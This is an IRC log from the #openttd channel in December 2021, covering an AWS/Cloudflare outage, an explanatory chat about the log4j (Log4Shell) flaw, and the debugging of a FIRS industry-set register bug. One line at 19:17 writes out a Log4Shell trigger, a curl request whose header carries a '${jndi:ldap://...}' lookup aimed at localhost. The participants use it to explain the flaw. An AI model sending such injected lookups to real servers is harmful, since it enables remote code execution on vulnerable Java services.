IRC logs for #openttd on OFTC at 2021-12-15
            
00:01:03 <DorpsGek> [OpenTTD/OpenTTD] michicc updated pull request #9725: Template DoCommand and friends https://git.io/JMoxK
00:02:07 *** geli has quit IRC (Quit: Stay safe!)
01:23:30 *** WormnestAndroid has quit IRC (Remote host closed the connection)
01:23:43 *** WormnestAndroid has joined #openttd
02:19:46 *** roadt__ has joined #openttd
02:26:35 *** roadt_ has quit IRC (Ping timeout: 480 seconds)
02:51:50 *** Wormnest has quit IRC (Quit: Leaving)
03:17:06 *** glx has quit IRC ()
03:20:08 *** D-HUND has joined #openttd
03:23:29 *** debdog has quit IRC (Ping timeout: 480 seconds)
03:54:49 *** D-HUND is now known as debdog
04:38:06 *** Flygon has joined #openttd
07:00:34 *** roadt__ has quit IRC (Read error: Connection timed out)
07:01:01 *** roadt__ has joined #openttd
07:36:07 *** sla_ro|master has joined #openttd
09:29:12 *** WormnestAndroid has quit IRC (Remote host closed the connection)
10:25:12 <Timberwolf> Paid-for work you at least have the fallback that someone else contributed to either the decision or its context.
10:27:33 <Timberwolf> I was having this cognitive dissonance the other day trying to get some very old software working... intense frustration at broken code in people's repos and builds with notes of, "real developers edit makefiles before building, so should you" while also being amazed someone put in the time and effort to build a complete and working emulator for a bunch of 1960s and 1970s mainframes, including weird
10:27:39 <Timberwolf> peripherals and hardware.
12:56:43 *** WormnestAndroid has joined #openttd
13:42:46 *** sla_ro|master has quit IRC ()
14:01:36 <peter1138> I've used goto in some c# source...
14:01:45 <peter1138> Perhaps I need to reevaluate my life.
14:06:46 *** Etua has joined #openttd
14:18:42 *** Etua has quit IRC (Quit: Etua)
14:24:16 *** Etua has joined #openttd
14:29:39 *** nielsm has joined #openttd
14:30:12 *** Etua has quit IRC (Quit: Etua)
14:49:00 *** gelignite has joined #openttd
14:55:10 *** glx has joined #openttd
14:55:10 *** ChanServ sets mode: +v glx
14:56:19 *** colde_ has joined #openttd
14:57:10 *** gregdek_ has joined #openttd
14:57:54 *** mindlesstux_ has joined #openttd
14:58:16 *** colde has quit IRC (Ping timeout: 480 seconds)
14:58:16 *** colde_ is now known as colde
14:59:31 *** gregdek has quit IRC (Ping timeout: 480 seconds)
14:59:31 *** gregdek_ is now known as gregdek
15:00:56 *** mindlesstux has quit IRC (Ping timeout: 480 seconds)
15:00:56 *** mindlesstux_ is now known as mindlesstux
15:01:41 *** ST2 has quit IRC (Ping timeout: 480 seconds)
15:02:43 *** ST2 has joined #openttd
16:04:47 *** andythenorth has joined #openttd
16:04:50 <andythenorth> lol
16:05:05 <andythenorth> AWS, Cloudflare availability issues
16:05:08 <andythenorth> so NPM is down
16:05:13 <andythenorth> amongst other things
16:09:35 <LordAro> ah, that'll be why i couldn't download something a while ago
16:09:47 <TrueBrain> Hi andythenorth, https://log4jmemes.com/, love, TrueBrain
16:10:24 <andythenorth> this one is inaccurate https://dl.airtable.com/.attachments/2f7c668073cee9ddcb71ba2091a0ef2a/ad0d0c80/KDnmlxQ.png
16:10:34 *** Wormnest has joined #openttd
16:10:43 <TrueBrain> And cloudflare? Or cloudfront?
16:10:58 <dwfreed> I wonder if there's log4j in smart cards
16:11:01 * dwfreed ducks
16:11:08 <dwfreed> or blu-ray players
16:11:19 <andythenorth> I have to check my mesh wifi provider
16:11:24 <LordAro> or SIM cards
16:11:36 <andythenorth> does it matter if it's in the SIMs?
16:11:41 <andythenorth> it will be in the telco networks
16:11:57 <andythenorth> we are currently doing full DR planning
16:12:15 <dwfreed> LordAro: arguably SIM cards are just a subclass of smart cards :P
16:13:56 <LordAro> arguably, yes
16:39:01 *** iSoSyS has joined #openttd
16:39:22 *** iSoSyS has quit IRC ()
17:09:13 *** frosch123 has joined #openttd
17:16:27 <frosch123> https://twitter.com/TheASF/status/1400875147163279374
17:17:06 <LordAro> oh no
17:17:35 *** Flygon has quit IRC (Quit: A toaster's basically a soldering iron designed to toast bread)
17:17:39 <frosch123> finally a good joke about *remote* code execution
17:55:10 <andythenorth> GG
18:07:39 <TrueBrain> I wonder how long the firmware update takes :P
18:09:05 <frosch123> esp. when the connection is already fully utilized by coin miners
18:23:47 <frosch123> hmm, i am not fluent enough in java to understand the root cause. is it because java has no warning "fomat not a string literal"?
18:24:44 <frosch123> and people logging strings directly using "logger.info(foo)", when they should use "logger.info("{}", foo)"?
18:26:01 <LordAro> also that one of those is essentially `eval <result from 3rdparty server>`
18:27:08 <frosch123> well, that's my main issue with the news... everyone talks about "there is a string formatter to execute code", but imho "external messages can contain format codes" is still broken
18:27:37 <frosch123> does noone care if "harmless string substituion" results in mess in the log file?
18:28:25 <frosch123> all the log4j patching feels like hiding/working around/mitigating a bug, instead of fixing it
18:28:29 <LordAro> mm, i'm not sure either
18:30:27 <LordAro> https://logging.apache.org/log4j/2.x/manual/api.html certainly suggests that you can do it without that
18:30:56 <LordAro> unless string parameters are also evaluated? which seems nuts, but so does the ability for your logging framework to make web requests
18:31:22 <frosch123> oof, that example in "substituteing parameters"...
18:31:49 <frosch123> it shows both methods
18:32:39 <frosch123> C people learned that the first version in invalid, and added warnings/errors. did java just miss that call?
18:34:25 <frosch123> oh, maybe the docs read like: "info("str" + foo)" is log4j 1.x, and "info("str {}", foo)" is log4j 2.x
18:34:40 <frosch123> though that does not make it any better
18:57:24 <andythenorth> so are we now mining on the moon?
18:58:32 <andythenorth> from what I read the log4j vuln is not a bug, it's firmly a feature, essential for backwards compatibility with the ecosystem
18:58:36 <andythenorth> in ways I didn't understand
18:58:45 <andythenorth> but I suspect LordAro has the appropriate XKCD to hand
19:13:02 <LordAro> 1172 or 972, perhaps?
19:13:05 <LordAro> or 1700
19:14:23 <andythenorth> 1700 is rather good
19:14:38 <andythenorth> I think 1172 is pertinent
19:16:21 <TrueBrain> frosch123: https://www.lunasec.io/docs/blog/log4j-zero-day/ to understand it in technical terms
19:16:40 <TrueBrain> but basically, no, escaping wasn't the issue on a user-level (from what I understand)
19:17:19 <TrueBrain> log.info("Requested Api Version:{}", apiVersion);
19:17:19 <TrueBrain> in a nutshell
19:17:19 <TrueBrain> curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'
19:18:58 <TrueBrain> so the first shitty thing is that the jndi thing makes an external call, which of course is bananas on its own
19:19:16 <TrueBrain> the second shitty thing is that if you return a Java class, it is being executed, for "backwards compatible" reasons :P
19:19:34 <TrueBrain> (and that is why it carries a score of 10 (out of 10))
19:21:23 <TrueBrain> andythenorth: no, the xkcd has been replaced by https://dl.airtable.com/.attachments/fc40ade9c20d8620461f8cb358b2467a/8006943c/image2.png
19:22:59 <andythenorth> the most important thing apparently was 'log for jay' or 'log forge'
19:23:11 <andythenorth> this is like PNG all over again
19:24:24 *** sla_ro|master has joined #openttd
19:28:00 <frosch123> TrueBrain: thanks, so format substitution happens multiple times then..
19:28:30 <frosch123> xkcd 1700 is in fact pretty close :)
19:30:16 <andythenorth> like a prediction
19:30:40 <andythenorth> part of our infosec stance is based on 'act as though everything is probably already owned'
19:30:47 <andythenorth> and this year we got to find out why
19:41:31 <frosch123> this year a lof of things failed :) fb, aws, java-everything, my ipv6 connection, ...
19:42:22 *** Wormnest has quit IRC (Ping timeout: 480 seconds)
19:48:01 <andythenorth> FIRS
19:48:19 <andythenorth> 4.4.0 has a bug that wipes out the value of perm register 2 sometimes, for reasons I don't see
19:48:38 <andythenorth> discord player gave me a confirmed repro of the result via screenshot
19:48:43 <andythenorth> but I don't know the trigger
19:49:25 *** WormnestAndroid has quit IRC (Ping timeout: 480 seconds)
19:49:37 <andythenorth> there are no other registers getting obviously zero-ed so I suspect 100% chance it's my code, not openttd
19:50:01 <frosch123> just set a watchpoint :p
19:50:04 <andythenorth> unless sometimes certain callbacks can run closely and out of sequence
19:51:16 <frosch123> what does that mean? are you using the register as a message queue between callbacks?
19:57:36 * andythenorth looks
19:57:47 <andythenorth> I suspect maybe multiple callbacks write to it
20:02:37 <andythenorth> seems not, in 4.4.0 at least
20:02:52 <andythenorth> I have rewritten some of these subsequently, not released
20:04:39 <glx> maybe you need to search for all \2psto in the generated nfo
20:05:41 <frosch123> i would assume if andy uses one write-storage in a pynml template, it results in 1M instances in the nfo :)
20:06:05 <glx> yeah but with different values
20:06:37 <andythenorth> the behaviour apparently arises randomly
20:06:41 <glx> and as I understand the report on discord it doesn't happen for all industries
20:06:41 <andythenorth> with no obvious repro
20:07:12 <glx> hand placed one don't trigger the issue, only random placed ones
20:07:51 <andythenorth> I've never seen it in any test game either
20:08:23 <andythenorth> n
20:08:32 <andythenorth> lol mistype
20:10:17 *** Wolf01 has joined #openttd
20:10:27 *** Wormnest has joined #openttd
20:24:21 <glx> I found 17 STORE_PERM, but I don't understand their meaning :)
20:26:13 <andythenorth> I only see storage 2 written once per industry
20:26:32 *** nielsm has quit IRC (Ping timeout: 480 seconds)
20:48:35 *** Eddi|zuHause is now known as Eddi|zuHause2
21:16:51 *** frosch123 has quit IRC (Quit: be yourself, except: if you have the opportunity to be a unicorn, then be a unicorn)
21:27:46 *** andythenorth has quit IRC (Quit: andythenorth)
21:29:30 *** Eddi|zuHause2 is now known as Eddi|zuHause
21:34:17 *** andythenorth has joined #openttd
21:57:04 *** WormnestAndroid has joined #openttd
21:59:03 *** andythenorth has quit IRC (Quit: andythenorth)
22:15:45 *** _aD has joined #openttd
22:15:58 *** Wormnest has quit IRC (Ping timeout: 480 seconds)
22:16:30 *** WormnestAndroid has quit IRC (Ping timeout: 480 seconds)
22:17:56 *** Wolf01 has quit IRC (Quit: Once again the world is quick to bury me.)
22:18:48 *** WormnestAndroid has joined #openttd
22:32:53 *** gelignite has quit IRC (Quit: Stay safe!)
22:40:36 *** Wormnest has joined #openttd
23:06:30 *** sla_ro|master has quit IRC ()